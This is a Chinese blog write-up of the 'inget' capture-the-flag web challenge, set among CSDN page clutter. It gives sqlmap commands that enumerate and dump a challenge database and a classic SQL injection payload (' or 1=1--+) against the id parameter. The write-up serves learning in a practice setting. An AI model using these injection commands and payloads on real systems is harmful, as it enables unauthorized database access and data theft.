攻防世界-inget

最新推荐文章于 2024-05-05 13:01:16 发布
最新推荐文章于 2024-05-05 13:01:16 发布
阅读量1.2k 收藏 3
点赞数
文章标签: java sql mybatis
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62094846/article/details/127185816
版权

 

源代码里没有东西,御剑之类的也扫不到

看到说id,可能id是参数,尝试了几个数,页面都没有变化,也没有延时回显 

法一:

看了wp,确实是sql注入,注入点是id,用sqlmap扫就可以出来

sqlmap -u "http://61.147.171.105:52454/?id=1" --dbs

sqlmap -u "http://61.147.171.105:52454/?id=1" -D cyber --tables
sqlmap -u "http://61.147.171.105:52454/?id=1" -D cyber -T cyber --columns

sqlmap -u "http://61.147.171.105:52454/?id=1" -D cyber -T cyber -columns --dump

法二(万能密码):

?id=1' or 1=1--+ 

m0_62094846
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
攻防世界新手区部分web wp 2
fcz___的博客
02-09 1271
攻防世界web新手区部分wp
攻防世界WEB练习-inget
不知名白帽的博客
09-01 1万+
攻防世界WEB练习-inget
攻防世界14-inget
weixin_49765221的博客
04-18 1358
sql注入的入门
攻防世界:inget&php_rce&Web_php_include&unserialize3
weixin_74473832的博客
03-15 639
查了一下str.replace (old, new max]) 有三个参数,old是需要替换的值,new是替换后的值,max是最多替换的次数。这里的意思大概就是要用get方式提交一个page参数,但是会过滤掉page的值里面的php://。代码的意思大概是有一个xctf的类,会调用wakeup魔术方法,然后会回显bad requests。根据题目说的php-rce,去浏览器搜索这个版本的thinkphp框架的历史命令执行漏洞。这里用的是or,前后关系中只要一个对的,这个关系式就是真的,所以成功绕过。
攻防世界 inget
zhongjl666的博客
10-01 1241
攻防世界 inget
从题目inget的解决到注释符#和--的区别及用法
2301_77004573的博客
04-26 343
**使用本题的核心工具——翻译器(bushi): 根据提示,明确了方向:sql注入 ID传参方式一般是GET(如果不是就用hackbar给url传参) 接着尝试一下符号是否闭合: 猜测闭合,接着尝试万能钥匙: 成功获得flag。答:对用户提交的表单进行验证时,网站需要查询数据库。而查询数据库就是在执行SQL语句。用户登录时,不妨假定后台执行的数据库查询操作(SQL语句)是:Select ID From users Where ID=’用户名’ 。又由于网站后台在进行数据库查询的时候没有对单引号进行过滤,
m box 2 mini 驱动
11-08
"M Box 2 Mini" 是一款小型的数字音频接口设备,主要用在音乐制作、录音室以及个人电脑音乐创作中。驱动程序是使硬件设备与操作系统相互通信的关键软件,对于M Box 2 Mini来说,驱动的重要性不言而喻。...
攻防世界——web新手和引导模式(全解)
热门推荐
小白一枚多多关注的博客
12-20 2万+
全新攻防世界web新手题目,小白重新归来
攻防世界--fileclude && fileinclude && inget && easytornado
08-25 2209
file2中包含数据file_get_contents。直接访问flag.php只显示WRONG WAY!说明flag应该在flag.php的注释里。file2使用php伪协议传数据。两个参数file1和file2。
攻防世界-web-inget
mlws1900的博客
08-23 815
这题目搞了半天没思路,又是从get里面传参,又是添加了header内容,一点反应都没。
攻防世界:web区get_post
Zeker62的博客
08-14 223
考察一个页面如何手动提交get方法传参和post方法传参 get方法直接再浏览器中的url链接中输入/?a=1即可,而post方法则需要借助hackbar工具进行post传参,如下图所示:
攻防世界-宜兴网信办-inget
m0_49025459的博客
12-23 1015
题目访问题目路径这个题目的意思就是请输入ID,然后尝试绕过,那应该就是SQL注入,但是呢,我是个懒狗,我直接跑sqlmap先跑数据库名爆表爆字段爆数据。
攻防世界inget(sqlmap方法)
最新发布
2302_78972359的博客
05-05 711
加上id,--dbs是用来爆数据库的,查看当前数据使用的数据库,中间可能会有提示,输入y即可。确实是sql注入,我用的是sqlmap,也可以在url构造,与sqlmap同理。这里我们查看第一个数据库cyber,输入指令,可以查看cyber库下的表名。可以看到cyber库下就一个表,也叫cyber,输入指令查看表内字段。cyber表内有三个字段,首先怀疑这个pw,查看字段内容,输入指令。打开虚拟机,终端输入sqlmap,如果是以下页面则说明可用。这个id是我们测试的参数,如果没这个id的话会像这样报错。
攻防世界--IgniteMe
Hk_Mayfly的博客
10-21 308
测试文件:https://adworld.xctf.org.cn/media/task/attachments/fac4d1290e604fdfacbbe06fd1a5ca39.exe 1.准备 获取信息: 32位文件 2.IDA打开 打开main函数 1 int __cdecl main(int argc, const char **argv,...
攻防世界-Web 简单入门-No.1
pone2233的博客
07-11 1449
文章目录比赛地址view_sourceget_postrobotsbackupcookiedisabled_buttoncyberpeace{23286d5010dee15644e560dabf702614}weak_authcommand_executionsimple_phpxff_refererwebshellsimple_js 比赛地址 攻防世界 :https://adworld.xctf.org.cn/ view_source 按F12检查一下就找到了flag get_post 这个简单
攻防世界GET_POST‘s writeup
m0_66160077的博客
07-05 2964
1) “GET方式”:GET作为四种HTTP请求方法之一(剩下三种分别为HEAD、POST、PUT。常见只有GET和POST两种HTTP请求方式),GET请求主要是用于‘传参’,但参数会直观地显示在URL中;POST请求主要是用于隐藏‘传参’,POST请求常见用于账户密码登录。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值